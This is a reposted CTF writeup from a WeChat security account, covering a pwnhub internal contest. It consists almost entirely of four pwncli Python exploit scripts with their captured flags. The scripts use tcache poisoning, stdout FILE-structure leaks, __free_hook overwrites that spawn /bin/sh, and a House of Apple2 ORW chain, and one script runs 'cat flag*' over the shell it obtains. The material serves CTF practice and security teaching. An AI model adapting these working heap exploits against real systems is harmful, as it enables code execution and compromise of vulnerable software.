sh_v1.1_exp_cli.py
#!/usr/bin/env python3
# Link: https://github.com/RoderickChan/pwncli
# Usage:
# Debug : python3 exp.py debug elf-file-path -t -b malloc
# Remote: python3 exp.py remote elf-file-path ip:port
# flag{love-life-love-freedom-d23s}
from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)
# CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)
"""
0: status
8: filename
------------
ls file:
status == 1: print
cat file:
status == 1: puts filecontent
touch file:
status == 0:
status = 1
filecontent = malloc(0x208)
strcpy(filename, xxx)
read()
cp file1 file2:
file1 == file[0].filename:
fine file2:
strncpy(file2, file[0], 0x208)
else:
find files[n].status == 0
files[n].status = 1
files[n].filename = file2
strncpy(file2, file[0], 0x208)
gedit file:
find filename
file.status == 1:
read(filecontent, 0x200)
rm file:
free(files[n])
files[n] = 0
ln target linkname:
find file:
find status==0:
strcpy(filename, linkname)
status = 1
linkname = target.content
"""
def cmd(i):
sla(">>>>", i)
def touch(filename, data="deadbeef", sendline=True):
cmd(f'touch {filename}')
print(" ")
s(data)
if sendline:
s("n")
def gedit(filename, data, sendline=True):
cmd(f'gedit {filename}')
print(" ")
s(data)
if sendline:
s("n")
def cat(filename):
cmd(f'cat {filename}')
def rm(filename):
cmd(f'rm {filename}')
def ln(target, linkname):
cmd(f'ln {target} {linkname}')
for i in range(8):
touch(f"file{i}")
ln("file0", "link0")
for i in range(7):
rm(f"file{i+1}")
rm("file0")
cat("link0")
main_arena_addr = recv_current_libc_addr() - 96
leak("main_arena_addr", main_arena_addr)
S()
lb = set_current_libc_base_and_log(main_arena_addr, 0x1ebb80)
for i in range(8):
touch(f"file{i}")
rm("file6")
rm("file7")
gedit("link0", p64(libc.sym.__free_hook-8))
S()
touch(f"file8")
touch(f"file9", flat("/bin/shx00", libc.sym.system))
rm("file9")
ia()
three_edit_exp_cli.py
#!/usr/bin/env python3
# Link: https://github.com/RoderickChan/pwncli
# Usage:
# Debug : python3 exp.py debug elf-file-path -t -b malloc
# Remote: python3 exp.py remote elf-file-path ip:port
# flag{12awxvpjsd-21aqxw-a3daxdlpsd-987@376hnb}
from pwncli import *
cli_script()
set_remote_libc('libc-2.31.so')
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
def cmd(i):
sla("is:", i)
def add(i, sz, data="deadbeef", sendline=True):
cmd('1')
sla("index:n", str(i))
sla("size:n", str(sz))
if sendline:
sla("content:n", data)
else:
sa("content:n", data)
def dele(i):
cmd('2')
sla("index?n", str(i))
def edit(i, data, sendline=True):
cmd('3')
sla("index?n", str(i))
if sendline:
sla("content:n", data)
else:
sa("new content:n", data)
add(0, 0x51, flat({0x40: [0, 0x71]}))
add(1, 0x50)
add(2, 0x50)
for i in range(9):
add(i+3, 0x70)
# add(12, 0x50)
dele(0)
dele(2)
S(0)
edit(-0x3e, "xf0")
for i in range(7):
dele(9 - i)
S(0)
add(3, 0x50)
add(4, 0x50, flat(0, 0x441))
S(0)
dele(1)
S(0)
add(0, 0x50)
add(1, 0x50)
if gift.remote:
off = 0x46a0
else:
off = (gift._libc_base + libc.sym._IO_2_1_stdout_) & 0xffff
S()
edit(-0x3c, p16(off))
S()
add(5, 0x70)
S()
add(6, 0x70, flat(0xfbad1887, 0, 0, 0, "x00"))
libcaddr = recv_current_libc_addr()
leak("libcaddr", libcaddr)
set_current_libc_base_and_log(libcaddr, 0x1eb980)
dele(1)
dele(0)
dele(4)
add(0, 0x60, flat(0, 0x61, libc.sym.__free_hook-8))
add(1, 0x50)
add(4, 0x50, flat("/bin/shx00", libc.sym.system))
dele(4)
ia()
tototo_exp_cli.py
#!/usr/bin/env python3
# Link: https://github.com/RoderickChan/pwncli
# Usage:
# Debug : python3 exp.py debug elf-file-path -t -b malloc
# Remote: python3 exp.py remote elf-file-path ip:port
# flag{1sddeasd-2axxxedw-a3dd23fdasd-a346gasdw}
from pwncli import *
cli_script()
set_remote_libc('libc-2.31.so')
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)
CurrentGadgets.set_find_area(find_in_elf=0, find_in_libc=1, do_initial=False)
def cmd(i):
sla("is:", i)
def add(i, sz): # 0x200-0x800
cmd('1')
sla("index?n", str(i))
sla("size?n", str(sz))
def add2(i, sz): # 0x200-0x800
cmd('5')
sla("index?n", str(i))
sla("size?n", str(sz))
def edit(i, data, sendline=True):
cmd('3')
sla("Which one?n", str(i))
if sendline:
sla("new content?n", data)
else:
sa("new content?n", data)
def show(i):
cmd('4')
sla("Which one?n", str(i))
def dele(i):
cmd('2')
sla("Which one?n", str(i))
add(2, 0x420)
add(0, 0x200)
add(1, 0x200)
add(7, 0x800)
dele(7)
add(8, 0x200)
add(3, 0x410)
add(4, 0x200)
dele(0)
dele(1)
show(1)
heapaddr = u64_ex(rn(6))
leak("heapaddr", heapaddr)
dele(2)
show(2)
libcaddr = u64_ex(rn(6))
leak("libcaddr", libcaddr)
lb = set_current_libc_base_and_log(libcaddr, 0x1ebbe0)
add(5, 0x600)
edit(2, flat(lb + 0x1ebfd0, 0, libc.sym._IO_list_all-0x20)[1:])
dele(3)
add(6, 0x600)
fff = IO_FILE_plus_struct()
payload = fff.house_of_apple2_stack_pivoting_when_do_IO_operation(standard_FILE_addr=heapaddr+0x620,
_IO_wfile_jumps_addr=libc.sym._IO_wfile_jumps,
leave_ret_addr=CurrentGadgets.leave_ret(),
pop_rbp_addr=CurrentGadgets.pop_rbp_ret(),
fake_rbp_addr=heapaddr+0x430+0x8
)
edit(7, flat({0x200-9: payload, 0x7:[
"flag.txt".ljust(0x10, "x00"),
CurrentGadgets.orw_chain(heapaddr+0x430, heapaddr)
]}, filler="x00"))
edit(4, "x00")
cmd('3') # exit 0
ia()
ttsc_exp_cli.py
#!/usr/bin/env python3
# Link: https://github.com/RoderickChan/pwncli
# Usage:
# Debug : python3 exp.py debug elf-file-path -t -b malloc
# Remote: python3 exp.py remote elf-file-path ip:port
# flag{12sd22222s-213edw-a3aaazcd-ad213dasd2sdw}
from pwncli import *
cli_script()
set_remote_libc('libc-2.27.so')
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)
# CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)
def cmd(i):
sla("chs:", i)
def add(i, sz, data="deadbeef"):
cmd('1')
sla("index?n", str(i))
sla("size:n", str(sz))
sleep(0.1)
s(data)
def dele(i):
cmd('2')
sla("index?n", str(i))
def edit(i, data):
cmd('3')
sla("index?n", str(i))
sa("content:", data)
sa("what is your name?n", "roderick"*2)
sla("age?n", str(18))
sla("high?n", str(18))
stackleak = recv_current_libc_addr()
leak("stack address", stackleak)
# 1. 记录你现在掌握的信息,漏洞、读写能力;你发现无法进行下一步利用,大概率你还有漏洞没找到
# 2. 写下你的利用过程,从读到写
# 通过栈,分配到stdout
# array size: 4
add(0, 0x18)
add(1, 0x28)
add(2, 0x78, flat(0, 0, 0, 0x21))
add(3, 0x78) # tcache_count
edit(0, flat({0x18: "x51"}))
dele(1)
dele(3)
dele(2)
add(1, 0x40, flat({0x20: [0, 0x31, stackleak-0x28b8]}))
S(0)
add(2, 0x78)
add(3, 0x78)
S(0)
dele(0)
add(0, 0x78, flat(0xfbad1887, 0, 0, 0, "x00"))
libcaddr = recv_current_libc_addr()
leak("libcaddr", libcaddr)
lb = set_current_libc_base_and_log(libcaddr, 0x3ed8b0)
S(0)
edit(0, flat(0xfbad1887, 0,
0, 0,
libc.sym._IO_2_1_stdout_+131, libc.sym._IO_2_1_stdout_+131,
libc.sym._IO_2_1_stdout_+131, libc.sym._IO_2_1_stdout_+131,
libc.sym._IO_2_1_stdout_+131+1, 0, 0, 0, 0, 0, 2, "n"))
leakaddr = stackleak+0x20
# tcache->key = 0
edit(0, flat(0xfbad1887, leakaddr,
leakaddr, leakaddr,
leakaddr, leakaddr+8,
leakaddr+8, leakaddr,
libc.sym._IO_2_1_stdout_+131+8, 0, 0, 0, 0, 0, 2, "n"))
codeaddr = u64(rn(8))
leak("codeaddr", codeaddr)
codebase = codeaddr-0x1080
dele(2)
edit(1, flat({0x30: codebase+0x202080}) + b"n")
dele(1)
add(1, 0x20)
add(2, 0x20, p64(libc.sym.__free_hook-8))
edit(0, flat("/bin/shx00", libc.sym.system, "n"))
dele(0)
sl("cat flag* >&2")
ia()
题目附件下载地址请后台回复:pwnhub03internal
原文始发于微信公众号(Arr3stY0u):【pwn专场】pwnhub内部赛writeup
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论